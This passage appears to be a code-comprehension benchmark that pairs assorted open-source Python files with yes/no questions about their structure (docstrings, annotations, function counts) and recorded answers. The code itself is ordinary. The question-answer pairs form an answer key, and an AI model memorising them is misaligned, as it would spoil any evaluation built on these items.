        # by document id, so "top k" returned the lowest ids instead.)
        ranked = sorted(scores.items(), key=lambda item: item[1], reverse=True)
        return [doc for doc, _ in ranked[:k]]  # returns top k documents

    def bm25_score(self, term_frequency, document_frequency, document_length):
        """BM25 contribution of one term occurring in one document."""
        norm = (1 - self.b) + self.b * (
            document_length / self.inverted_index.average_document_length
        )
        # Saturating TF component. (Bug fix: the original was missing the
        # parentheses around the denominator: `tf / k1 * norm + tf`.)
        tf = term_frequency / (self.k1 * norm + term_frequency)
        idf = np.log(
            (self.total_documents - document_frequency + 0.5)
            / (document_frequency + 0.5)
        )
        return tf * idf
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | lecture1/code/bm25_search_relevance.py | shahrukhx01/advanced-information-retrieval-tu-wien |
"""
Runner for a Celery Python function
"""
from __future__ import absolute_import
import time
from uuid import uuid4
from importlib import import_module
from ..event import BaseEvent
from ..utils import add_data_if_needed
class CeleryRunner(BaseEvent):
    """
    Represents Python Celery event runner.
    """

    ORIGIN = 'runner'
    RESOURCE_TYPE = 'celery'
    OPERATION = 'execute'

    def __init__(self, *args, **kwargs):  # pylint: disable=unused-argument
        """
        Initialize.
        :param start_time: event's start time (epoch).
        """
        super(CeleryRunner, self).__init__(time.time())
        self.event_id = str(uuid4())
        # Task name comes from the Celery signal's `sender` when present.
        self.resource['name'] = (
            kwargs.get('sender').name
            if kwargs.get('sender')
            else ''
        )
        self.resource['operation'] = self.OPERATION
        # Broker connection details of the currently configured Celery app.
        app_conn = import_module('celery').current_app.connection()
        task_id = kwargs.get('task_id', '')
        body = kwargs.get('args')
        retval = kwargs.get('retval')
        state = kwargs.get('state', '')
        self.resource['metadata'].update({
            'id': task_id,
            'state': state,
            'hostname': app_conn.hostname,
            'virtual_host': app_conn.virtual_host,
            'driver': app_conn.transport.driver_type,
        })
        # Attach args/retval to the metadata only when they are truthy.
        if body:
            add_data_if_needed(
                self.resource['metadata'],
                'args',
                body
            )
        if retval:
            add_data_if_needed(
                self.resource['metadata'],
                'retval',
                retval
            )

    def set_retry(self, attempt_number):
        """
        Setting retry attempt number
        """
        self.resource['metadata']['attempt_number'] = attempt_number
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},... | 3 | epsagon/runners/celery.py | clericeon/epsagon-python |
def declare_variables(variables, macro):
    """
    This is the hook for the functions
    - variables: the dictionary that contains the variables
    - macro: a decorator function, to declare a macro.
    """
    @macro
    def inputcode(filename, language):
        """Return the contents of *filename* as a fenced code block."""
        # Bug fix: use a context manager so the file handle is always closed
        # (the original opened the file and never closed it).
        with open(filename, 'r') as f:
            text = f.read()
        return f'```{language}\n{text}\n```'

    @macro
    def inputcpp(filename):
        """Shorthand: include *filename* as a C++ code block."""
        return inputcode(filename, 'cpp')
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | main.py | ram-nad/autodiff |
#! /usr/bin/env python
"""provide some mediawiki markup example snippets"""
import os
class snippet(object):
    """One markup example: its raw text and its index within snippets.txt."""

    def __init__(self, txt, id):
        self.txt = txt
        self.id = id

    def __repr__(self):
        return "<%s %r %r...>" % (self.__class__.__name__, self.id, self.txt[:10])


def get_all():
    """Split snippets.txt on form-feed separators into snippet objects.

    NOTE(review): relies on the Python-2-only builtins `unicode`/`unichr`;
    this function will not run under Python 3 as written.
    """
    fp = os.path.join(os.path.dirname(__file__), 'snippets.txt')
    # chr(12) is the form-feed character used as the record separator.
    examples = unicode(open(fp).read(), 'utf-8').split(unichr(12) + '\n')[1:]
    res = []
    for i, x in enumerate(examples):
        res.append(snippet(x, i))
    return res
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | mwlib/snippets.py | pediapress/mwlib |
"""
Plotting utilities for example notebooks
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_image(image=None, mask=None, ax=None, factor=3.5/255, clip_range=(0, 1), **kwargs):
    """ Utility function for plotting RGB images and masks.

    :param image: RGB image array, or None to plot the mask on its own
    :param mask: binary mask; drawn opaque white alone, translucent yellow
        when overlaid on an image
    :param ax: target matplotlib axes (a new 15x15 figure is made if None)
    :param factor: brightness scale applied to the image before clipping
    :param clip_range: (min, max) passed to np.clip after scaling
    :param kwargs: forwarded to ax.imshow
    """
    if ax is None:
        _, ax = plt.subplots(nrows=1, ncols=1, figsize=(15, 15))
    # White when the mask is shown alone, translucent yellow as an overlay.
    mask_color = [255, 255, 255, 255] if image is None else [255, 255, 0, 100]
    if image is None:
        if mask is None:
            raise ValueError('image or mask should be given')
        # Black background with the same spatial shape as the mask.
        image = np.zeros(mask.shape + (3,), dtype=np.uint8)
    ax.imshow(np.clip(image * factor, *clip_range), **kwargs)
    if mask is not None:
        cloud_image = np.zeros((mask.shape[0], mask.shape[1], 4), dtype=np.uint8)
        cloud_image[mask == 1] = np.asarray(mask_color, dtype=np.uint8)
        ax.imshow(cloud_image)
def plot_probabilities(image, proba, factor=3.5/255):
    """ Utility function for plotting a RGB image and its cloud probability map next to each other.

    :param image: RGB image array (left panel)
    :param proba: per-pixel cloud probability map (right panel, inferno cmap)
    :param factor: brightness scale applied to the image before clipping
    """
    plt.figure(figsize=(15, 15))
    ax = plt.subplot(1, 2, 1)
    ax.imshow(np.clip(image * factor, 0, 1))
    ax = plt.subplot(1, 2, 2)
    ax.imshow(proba, cmap=plt.cm.inferno)
    # Bug fix: the original accessed `plt.show` without calling it (twice),
    # which is a no-op. Call it once after both subplots are drawn.
    plt.show()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | examples/plotting_utils.py | Broly498/sentinel2-cloud-detector |
import logging,os
from rest import Restclient
LOCAL_DATA_FOLDER = '/DATA'
GENOTYPE_FOLDER = '/GENOTYPE'
# REST credentials are read from the environment; a missing variable raises
# KeyError at import time, failing fast.
REST_HOST = os.environ['REST_HOST']
REST_USERNAME = os.environ['REST_USERNAME']
REST_PASSWORD = os.environ['REST_PASSWORD']
# Module-level client shared by everything importing this module.
restclient = Restclient(REST_HOST,REST_USERNAME,REST_PASSWORD)


class CeleryProgressLogHandler(logging.StreamHandler):
    """Log handler forwarding 'progress' log records to a Celery task state."""

    def __init__(self,task):
        logging.StreamHandler.__init__(self)
        self.task = task

    def emit(self,record):
        # Only records carrying a `progress` attribute are forwarded.
        if 'progress' in record.__dict__:
            progress = record.__dict__['progress']
            msg = self.format(record)
            # An explicit `task` attribute overrides the formatted message.
            if 'task' in record.__dict__:
                msg = record.__dict__['task']
            body = {'progress':progress,'task':msg}
            self.task.update_state(state='PROGRESS',meta=body)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | gwaportalpipeline/common.py | timeu/gwaportal-analysis-pipeline |
from fastapi import FastAPI
from starlette.responses import PlainTextResponse
from starlette.staticfiles import StaticFiles
from typing import Dict, Optional as Opt
from pydantic import BaseModel
from starlette.requests import Request
"""
* Have programme create the srimdata and pickle/sqlite it
* create api points with fast api
* uppcikle data, serve to api
* display in webpage starlette: list page and item pages
"""
"""
* buttons / inputs to run new srims
* login auth
"""
class Item(BaseModel):
    """Request/response schema for the /items endpoints."""
    name: str
    description: Opt[str] = None
    price: float
    tax: Opt[float] = None


app = FastAPI()
# Serve files under ./static at the /static URL prefix.
app.mount("/static", StaticFiles(directory="static"), name="static")


@app.post("/items/")
async def create_item(item: Item) -> Item:
    """Echo the validated item back to the caller."""
    return item


@app.get("/items/{item_id}")
async def read_item(item_id: int) -> Dict[str, int]:
    """Return the path parameter wrapped in a small JSON object."""
    return {"item_id": item_id}


@app.get("/")
async def home(request: Request) -> PlainTextResponse:
    """Plain-text landing page."""
    return PlainTextResponse(f"Hello, world!")
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exc... | 3 | src/webgui.py | Yobmod/dmlsrim |
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from batchgenerators.utilities.file_and_folder_operations import *
def remove_trailing_slash(filename: str):
while filename.endswith('/'):
filename = filename[:-1]
return filename
def maybe_add_0000_to_all_niigz(folder):
nii_gz = subfiles(folder, suffix='.nii.gz')
for n in nii_gz:
n = remove_trailing_slash(n)
if not n.endswith('_0000.nii.gz'):
os.rename(n, n[:-7] + '_0000.nii.gz')
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | nnunet/utilities/file_endings.py | anxingle/nnUNet_simple |
from conan_tests.test_regression.utils.base_exe import BaseExeTest, run, conan_create_command
class Bzip2Test(BaseExeTest):
libref = "bzip2/1.0.6@conan/stable"
librepo = "https://github.com/lasote/conan-bzip2.git"
branch = "release/1.0.6"
def setUp(self):
super(Bzip2Test, self).setUp()
run("conan remove %s -f" % self.libref)
def test_repo(self):
run("git clone --depth 1 %s -b %s ." % (self.librepo, self.branch))
run(conan_create_command("conan/testing"))
def test_install_remote(self):
run("git clone --depth 1 %s -b %s ." % (self.librepo, self.branch))
run("conan test test_package %s" % self.libref)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | conan_tests/test_regression/packages/bzip2_test.py | jgsogo/test |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeQuotaRequest(JDCloudRequest):
"""
查询配额信息
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeQuotaRequest, self).__init__(
'/regions/{regionId}/quotas/', 'GET', header, version)
self.parameters = parameters
class DescribeQuotaParameters(object):
def __init__(self, regionId, type, ):
"""
:param regionId: Region ID
:param type: 资源类型,取值范围:vpc、elastic_ip、subnet、security_group、vpcpeering、network_interface(配额只统计辅助网卡)
"""
self.regionId = regionId
self.type = type
self.parentResourceId = None
def setParentResourceId(self, parentResourceId):
"""
:param parentResourceId: (Optional) type为vpc、elastic_ip、network_interface不设置, type为subnet、security_group、vpcpeering设置为vpcId
"""
self.parentResourceId = parentResourceId
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | jdcloud_sdk/services/vpc/apis/DescribeQuotaRequest.py | jdcloud-demo/jdcloud-sdk-python |
import numpy
from fframework import asfunction, OpFunction
__all__ = ['Angle']
class Angle(OpFunction):
"""Transforms a mesh into the angle of the mesh to the x axis."""
def __init__(self, mesh):
"""*mesh* is the mesh Function."""
self.mesh = asfunction(mesh)
def __call__(self, ps):
"""Returns the arctan2. The (y, x) coordinate is in the last
dimension."""
meshT = self.mesh(ps).T
return numpy.arctan2(meshT[0], meshT[1]).T
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},... | 3 | moviemaker3/math/angle.py | friedrichromstedt/moviemaker3 |
""" """
import pygame
class Robot:
def __init__(self, screen):
self.screen = screen
self.image = pygame.image.load('images/robot.bmp')
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
def blitme(self):
self.screen.blit(self.image, self.rect) | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | python/python_crash_course/project_alien_invasion/robot.py | lmonsalve22/Learning-to-Code |
from __future__ import print_function
from time import sleep
import matplotlib.pyplot as plt
import signal
def sigIntHandler(signal, frame):
raise KeyboardInterrupt
def publishPose(q, problem, t=0.0):
problem.getScene().Update(q, t)
problem.getScene().getSolver().publishFrames()
def publishTrajectory(traj, T, problem):
if len(traj) == 0:
print("Trajectory has zero elements")
raise
signal.signal(signal.SIGINT, sigIntHandler)
print('Playing back trajectory '+str(T)+'s')
dt = float(T)/float(len(traj))
t = 0
while True:
try:
publishPose(traj[t], problem, float(t)*dt)
sleep(dt)
t = (t+1) % len(traj)
except KeyboardInterrupt:
return False
return True
def publishTimeIndexedTrajectory(traj, Ts, problem, once=False):
if len(traj) == 0:
print("Trajectory has zero elements")
raise
signal.signal(signal.SIGINT, sigIntHandler)
print('Playing back trajectory '+str(len(Ts)) +
' states in '+str(Ts[len(Ts)-1]))
idx = 0
while True:
try:
for i in range(1, len(Ts)-1):
publishPose(traj[i], problem, Ts[i])
sleep(Ts[i]-Ts[i-1])
if once:
break
except KeyboardInterrupt:
return False
return True
def plot(solution):
print('Plotting the solution')
plt.plot(solution, '.-')
plt.show()
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written ... | 3 | exotica_python/src/pyexotica/publish_trajectory.py | LongfeiProjects/exotica |
import sys
import socket
sys.path.append('../')
import common.define
BUF_SIZE = 2048
class ReptilesServerSocket():
def __init__(self, sock=None):
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
def setsocket(self):
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def bind(self):
self.sock.bind((common.define.SERVER_IP_ADDR, common.define.SERVER_PORT))
def listen(self, num=1):
self.sock.listen(num)
def accept(self):
self.conn, self.addr = self.sock.accept()
def send(self, msg):
totalsent = 0
msglen = len(msg)
while totalsent < msglen:
sent = self.conn.send(msg[totalsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
def receive(self, msglen):
chunks = []
bytes_recd = 0
while bytes_recd < msglen:
chunk = self.conn.recv(min(msglen - bytes_recd, 2048))
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b''.join(chunks)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | controlapp/monitorapp/src/serverapp/serversocket/reptilesserversocket.py | kuspen/reptiles-monitor |
# Connection libraries
import os
import shutil
import re
# Class create project
class Create:
def __init__(self, path):
self.path = path
# Create project
def createProject(self, name):
if not os.path.isdir(self.path + name):
shutil.copytree("launcher/shablon/", self.path + name)
else:
n, a = os.listdir(path=self.path), []
for s in n:
if s.find("new") != -1: a.append(s)
shutil.copytree("launcher/shablon/", self.path + name + str(len(a)))
# Delete project
def deleteProject(self, name):
shutil.rmtree(self.path+name) | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | create.py | KValexander/pygame_vn |
# custom PosLemmaTagger based on Chatterbot tagger
import string
from chatterbot import languages
import spacy
from chatterbot import tagging
class CustomPosLemmaTagger(tagging.PosLemmaTagger):
def __init__(self, language=None):
super(CustomPosLemmaTagger, self).__init__(language=None)
def get_bigram_pair_string(self, text):
"""
Return a string of text containing part-of-speech, lemma pairs.
"""
bigram_pairs = []
if len(text) <= 2:
text_without_punctuation = text.translate(self.punctuation_table)
if len(text_without_punctuation) >= 1:
text = text_without_punctuation
document = self.nlp(text)
if len(text) <= 2:
bigram_pairs = [
token.lemma_.lower() for token in document
]
else:
tokens = [
token for token in document if token.is_alpha and not token.is_stop
]
if len(tokens) < 2:
tokens = [
token for token in document if token.is_alpha
]
for index in range(0, len(tokens)):
bigram_pairs.append('{}:{}'.format(
tokens[index].pos_,
tokens[index].lemma_.lower()
))
if not bigram_pairs:
bigram_pairs = [
token.lemma_.lower() for token in document
]
return ' '.join(bigram_pairs)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | tagging.py | sciutrux/cbotami |
import vcr
from copy import deepcopy
from unittest import TestCase
from .test_helper import CLIENT, PLAYGROUND_SPACE
class ResourceTest(TestCase):
@vcr.use_cassette('fixtures/resource/copy.yaml')
def test_can_properly_deepcopy(self):
entry = CLIENT.spaces().find(PLAYGROUND_SPACE).environments().find('master').entries().all()[0]
copied_entry = deepcopy(entry)
self.assertEqual(entry.raw, copied_entry.raw)
self.assertEqual(entry.fields(), copied_entry.fields())
self.assertEqual(entry.id, copied_entry.id)
class LinkTest(TestCase):
@vcr.use_cassette('fixtures/link/space_resolve.yaml')
def test_space_link_resolve(self):
space = CLIENT.spaces().find(PLAYGROUND_SPACE)
resolved_space = space.to_link().resolve()
self.assertEqual(resolved_space.id, PLAYGROUND_SPACE)
self.assertEqual(str(resolved_space), str(space))
@vcr.use_cassette('fixtures/link/resolve.yaml')
def test_link_resolve(self):
content_type = CLIENT.content_types(PLAYGROUND_SPACE, 'master').find('foo')
resolved_ct = content_type.to_link().resolve(PLAYGROUND_SPACE, 'master')
self.assertEqual(resolved_ct.id, 'foo')
self.assertEqual(str(resolved_ct), str(content_type))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},... | 3 | tests/resource_test.py | pce/contentful-management.py |
import brownie
def test_deposit_for(accounts, liquidity_gauge, mock_lp_token):
mock_lp_token.approve(liquidity_gauge, 2 ** 256 - 1, {"from": accounts[0]})
balance = mock_lp_token.balanceOf(accounts[0])
liquidity_gauge.set_approve_deposit(accounts[0], True, {"from": accounts[1]})
liquidity_gauge.deposit(100000, accounts[1], {"from": accounts[0]})
assert mock_lp_token.balanceOf(liquidity_gauge) == 100000
assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
assert liquidity_gauge.totalSupply() == 100000
assert liquidity_gauge.balanceOf(accounts[1]) == 100000
def test_set_approve_deposit_initial(accounts, liquidity_gauge):
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is False
def test_set_approve_deposit_true(accounts, liquidity_gauge):
liquidity_gauge.set_approve_deposit(accounts[0], True, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is True
def test_set_approve_deposit_false(accounts, liquidity_gauge):
liquidity_gauge.set_approve_deposit(accounts[0], False, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is False
def test_set_approve_deposit_toggle(accounts, liquidity_gauge):
for value in [True, True, False, False, True, False, True]:
liquidity_gauge.set_approve_deposit(accounts[0], value, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is value
def test_not_approved(accounts, liquidity_gauge, mock_lp_token):
mock_lp_token.approve(liquidity_gauge, 2 ** 256 - 1, {"from": accounts[0]})
with brownie.reverts("Not approved"):
liquidity_gauge.deposit(100000, accounts[1], {"from": accounts[0]})
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | tests/unitary/LiquidityGauge/test_deposit_for.py | AqualisDAO/curve-dao-contracts |
"""
This module defines the database classes.
"""
import pymongo
from atomate.utils.database import CalcDb
from atomate.utils.utils import get_logger
__author__ = "Kiran Mathew"
__credits__ = "Anubhav Jain"
__email__ = "kmathew@lbl.gov"
logger = get_logger(__name__)
class LammpsCalcDb(CalcDb):
def __init__(
self,
host="localhost",
port=27017,
database="lammps",
collection="tasks",
user=None,
password=None,
**kwargs
):
super().__init__(host, port, database, collection, user, password, **kwargs)
def build_indexes(self, indexes=None, background=True):
indexes = indexes or []
self.collection.create_index("task_id", unique=True, background=background)
self.collection.create_index(
[("completed_at", pymongo.DESCENDING)], background=background
)
for i in indexes:
self.collection.create_index(i, background=background)
def reset(self):
self.collection.delete_many({})
self.db.counter.delete_one({"_id": "taskid"})
self.db.counter.insert_one({"_id": "taskid", "c": 0})
self.build_indexes()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | atomate/lammps/database.py | Zhuoying/atomate |
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test for the ZMQ RPC methods."""
from test_framework.test_framework import DollarTestFramework
from test_framework.util import assert_equal
class RPCZMQTest(DollarTestFramework):
address = "tcp://127.0.0.1:217703"
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def skip_test_if_missing_module(self):
self.skip_if_no_py3_zmq()
self.skip_if_no_dollard_zmq()
def run_test(self):
self._test_getzmqnotifications()
def _test_getzmqnotifications(self):
self.restart_node(0, extra_args=[])
assert_equal(self.nodes[0].getzmqnotifications(), [])
self.restart_node(0, extra_args=["-zmqpubhashtx=%s" % self.address])
assert_equal(self.nodes[0].getzmqnotifications(), [
{"type": "pubhashtx", "address": self.address},
])
if __name__ == '__main__':
RPCZMQTest().main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | test/functional/rpc_zmq.py | Dollar-coin/Dollar |
from conans import ConanFile, CMake
class AbcConan(ConanFile):
generators = "cmake", "cmake_find_package"
requires = "boost/1.76.0"
def build(self):
cmake = self.cmake
cmake.configure()
cmake.build()
@property
def cmake(self):
return CMake(self)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | conanfile.py | levenkov/alphabet |
"""
Tests utils for tagging.
"""
from django.template import Origin
from django.template.loaders.base import Loader
class VoidLoader(Loader):
"""
Template loader which is always returning
an empty template.
"""
is_usable = True
_accepts_engine_in_init = True
def get_template_sources(self, template_name):
yield Origin(
name='voidloader',
template_name=template_name,
loader=self)
def get_contents(self, origin):
return ''
def load_template_source(self, template_name, template_dirs=None):
return ('', 'voidloader:%s' % template_name)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | tagging/tests/utils.py | randlet/django-tagging |
from pybox.inject import Inject, InjectLazy
from pybox.service import IService, ServiceMode
class SingletonService(IService):
def who_am_i(self):
print(f'Singleton {id(self)}')
class FactoryService(IService):
singleton = Inject(SingletonService)
@classmethod
def service_mode(self):
return ServiceMode.FACTORY
def who_am_i(self):
print(f'Factory {id(self)}')
class A:
singleton1 = Inject(SingletonService)
singleton2 = InjectLazy(SingletonService)
factory1 = Inject(FactoryService)
factory2 = InjectLazy(FactoryService)
def who_am_i(self):
print(f'A {id(self)}')
if __name__ == '__main__':
a = A()
assert a.singleton1 is a.singleton2
assert isinstance(a.singleton1, SingletonService)
assert isinstance(a.factory1, FactoryService)
assert isinstance(a.factory2, FactoryService)
assert a.factory1 is not a.factory2
a.factory1.who_am_i()
a.factory2.who_am_i()
a.singleton1.who_am_i()
a.singleton2.who_am_i()
a.factory1.singleton.who_am_i()
a.factory2.singleton.who_am_i()
a.who_am_i()
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | tests/test_integration.py | vadim2404/pybox |
"""
_RunJobByStatus_
Monitoring DAO classes for Jobs in BossAir database.
It groups jobs in each sched_status and bossAir status and guarantee
all sched_status are always present in the output.
"""
from __future__ import print_function, division
from WMCore.Database.DBFormatter import DBFormatter
class RunJobByStatus(DBFormatter):
sql = """
SELECT bl_status.name AS sched_status, count(bl_runjob.sched_status) AS count, bl_runjob.status
FROM bl_status
LEFT OUTER JOIN bl_runjob ON bl_runjob.sched_status = bl_status.id
GROUP BY bl_status.name, bl_runjob.status
"""
def formatDict(self, results):
"""
_formatDict_
Creates a dictionary of active (status=1) and completed (status=0)
jobs in BossAir with their sched_status and the amount of jobs in that status
"""
formattedResults = DBFormatter.formatDict(self, results)
results = {'active': {}, 'completed': {}}
for res in formattedResults:
results['active'].setdefault(res['sched_status'], 0)
results['completed'].setdefault(res['sched_status'], 0)
if res['status'] is None:
pass # job count is always 0 for this case
elif int(res['status']) == 0:
results['completed'][res['sched_status']] += int(res['count'])
else: # status = 1
results['active'][res['sched_status']] += int(res['count'])
return results
def execute(self, conn=None, transaction=False):
result = self.dbi.processData(self.sql, conn=conn, transaction=transaction)
return self.formatDict(result)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | src/python/WMCore/BossAir/MySQL/RunJobByStatus.py | khurtado/WMCore |
import superturtle, turtle
turtle.setup(500,500)
wn = turtle.Screen()
wn.title("Turtle Chase!")
wn.bgcolor("pink")
player_one = superturtle.SuperTurtle()
player_two = superturtle.SuperTurtle()
# make anouncements
player_one.write(" Bet you can't catch me!")
player_two.write(" Im gonna catch you man.")
# helper functions
def quit_window():
wn.bye()
def check():
print("checking")
keep_on_screen()
collision()
wn.ontimer(check, 10)
def keep_on_screen():
# check player_1 one all 4 angles
if player_one.xcor() < -250:
player_one.goto(-249, player_one.ycor())
if player_one.xcor() > 250:
player_one.goto(249, player_one.ycor())
if player_one.ycor() < -250:
player_one.goto(player_one.xcor(), -249)
if player_one.ycor() > 250:
player_one.goto(player_one.xcor(), 249)
# check player_2 on all 4 angles
if player_two.xcor() < -250:
player_two.goto(-249, player_two.ycor())
if player_two.xcor() > 250:
player_two.goto(249, player_two.ycor())
if player_two.ycor() < -250:
player_two.goto(player_two.xcor(), -249)
if player_two.ycor() > 250:
player_two.goto(player_two.xcor(), 249)
def collision():
x_diff = abs(player_one.xcor() - player_two.xcor())
y_diff = abs(player_one.ycor() - player_two.ycor())
if x_diff < 20 and y_diff <20:
quit_window()
# PLAYER ONE CONTROLS
wn.onkey(player_one.move_forward, "Up")
wn.onkey(player_one.turn_left, "Left")
wn.onkey(player_one.turn_right, "Right")
wn.onkey(player_one.home, "Down") #jump to middle of screen
# PLAYER TWO CONTROLS
wn.onkey(player_two.move_forward, "w")
wn.onkey(player_two.turn_left, "a")
wn.onkey(player_two.turn_right, "d")
wn.onkey(player_two.home, "s") #jump to middle of screen
# GAME CONTROLS
wn.onkey(quit_window, "q")
wn.listen()
# check for collision and out of bounds
check()
wn.mainloop() | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | TurtleChase.py | ewiertel/TurtleChase |
from django.core.checks import messages
from rest_framework import generics
from rest_framework.response import Response
